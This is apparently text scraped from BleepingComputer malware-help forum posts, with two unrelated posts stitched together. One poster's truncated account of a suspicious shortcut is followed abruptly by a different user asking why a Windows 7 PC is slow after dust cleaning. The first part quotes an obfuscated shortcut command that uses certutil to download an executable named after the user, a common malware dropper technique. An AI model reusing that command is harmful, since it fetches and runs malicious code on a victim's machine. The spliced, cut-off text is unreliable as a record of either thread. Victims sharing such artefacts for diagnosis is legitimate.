When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results. The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! Computer running slow after cleaning (not overheating) - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Hello, so I've had my computer about 3 years now and although it has been slowing down it did usually run the games I enjoy relatively easily.

It's specs are:
Windows 7
Processor: AMD FX™-4350 Quad-Core 420 GHz
Video Card: NVIDIA GeForce GTX 750Ti
64bit Operating system
8gb of RAM

So it started a couple of days ago when my computer kept turning off after about 10 mins of being on. After a quick Google search I thought overheating would be the problem. So I took the cover off my PC and used a hairdryer and some cottonbuds to clean out the dust that had built up behind the heatsink fan. It worked partially because my computer now won't turn off.... But it is now painfully slow (like struggling to load a YouTube video on low quality slow). I installed a program called Core temp to check the temp and it showed the temp or the processor was not going above 39.
Because of quarantine I can't take my PC to a repair shop and have an assignment due in on the 17th so can't afford to lose my PC right now.
Does anyobe have a solution that someone with no tech experience can perform quickly, thanks in advance.
